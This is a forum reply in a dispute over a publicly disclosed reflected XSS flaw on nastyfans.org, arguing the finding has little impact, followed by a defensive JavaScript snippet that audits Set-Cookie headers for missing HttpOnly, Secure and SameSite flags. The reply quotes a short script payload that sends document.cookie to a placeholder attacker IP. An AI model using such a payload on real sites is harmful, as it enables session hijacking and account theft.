Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
by
bob123
on 23/06/2020, 09:17:37 UTC
⭐ Merited by Foxpup (2) ,OgNasty (2)
[...]
I do not know who naypalm is and it seems he last logged in a week back and is very infrequent here.
So I would disclose the vulnerability to the forum (only).

--------------------------
End of PM
--------------------------

So because he logs in infrequently you decided to publicly disclose it?
Because you need the attention and can't wait a month or two for it to be fixed?



Bottom line: What much one can do with reflected XSS? It is shit..and again one more shit reflected XSS by boris007 --Bob123456, Cat meow.
Top Line: https://www.dionach.com/blog/the-real-impact-of-cross-site-scripting/  --Security Community

All you can do is obviously to use the free version of the burp suite and make popups.
You found a reflected XSS, not a persistent one.

You like your low-level examples, I understood this already.

For example, this:
<script>
  image = new Image();
  image.src='https://[Attacker IP]:8080/?'+document.cookie;
</script>

This is only possible if the HttpOnly flag is not set.
Otherwise the cookie cannot be accessed by a script.

All you can do with that is to craft your own URL, and send it to someone to have the script executed.

How would you exploit that on such a site, where no valuable or sensitive information is being stored/entered anyway?
Short answer: You can't.


You are obviously a script kiddie, breaking laws and being a dick, just to gain some attention.
You don't understand what you actually found and don't know how this could be exploited.
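
The HttpOnly point made in the post above can be checked from the defender's side by auditing a site's `Set-Cookie` response headers. The following is an added example, not part of the original post or of any site's code; the header values are constructed samples and the function names are hypothetical.

```javascript
// Constructed sample Set-Cookie header values (not taken from any real site).
const SAMPLE_SET_COOKIE = [
  'PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax',
  'session=eyJ1IjoxfQ==; path=/; httponly',
  'theme=dark; Path=/; Max-Age=31536000',
  'csrf=9f8e7d; Path=/; Secure',
];

// Parse one Set-Cookie value into { name, value, attrs }.
// Attribute names are case-insensitive; only the first '=' splits a pair,
// so base64 padding inside the cookie value is preserved.
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  if (eq < 1) return null; // malformed or nameless cookie: skipped here
  const attrs = {};
  for (const part of rest) {
    if (!part) continue;
    const i = part.indexOf('=');
    const key = (i === -1 ? part : part.slice(0, i)).trim().toLowerCase();
    attrs[key] = i === -1 ? true : part.slice(i + 1).trim();
  }
  return { name: pair.slice(0, eq), value: pair.slice(eq + 1), attrs };
}

// List every cookie that is missing a protective attribute.
function auditCookies(headers) {
  const findings = [];
  for (const h of headers) {
    const c = parseSetCookie(h);
    if (!c) continue;
    const issues = [];
    if (!c.attrs.httponly) issues.push('no HttpOnly: readable via document.cookie');
    if (!c.attrs.secure) issues.push('no Secure: also sent over plain HTTP');
    if (!c.attrs.samesite) issues.push('no SameSite: browser default applies');
    if (issues.length) findings.push({ name: c.name, issues });
  }
  return findings;
}

// Names of cookies that a script running in the page could read.
function scriptReadable(headers) {
  return auditCookies(headers)
    .filter((f) => f.issues.some((i) => i.startsWith('no HttpOnly')))
    .map((f) => f.name);
}

console.log(JSON.stringify(auditCookies(SAMPLE_SET_COOKIE), null, 2));
```

HttpOnly only stops script from reading the cookie; it does not stop an injected script from running in the page.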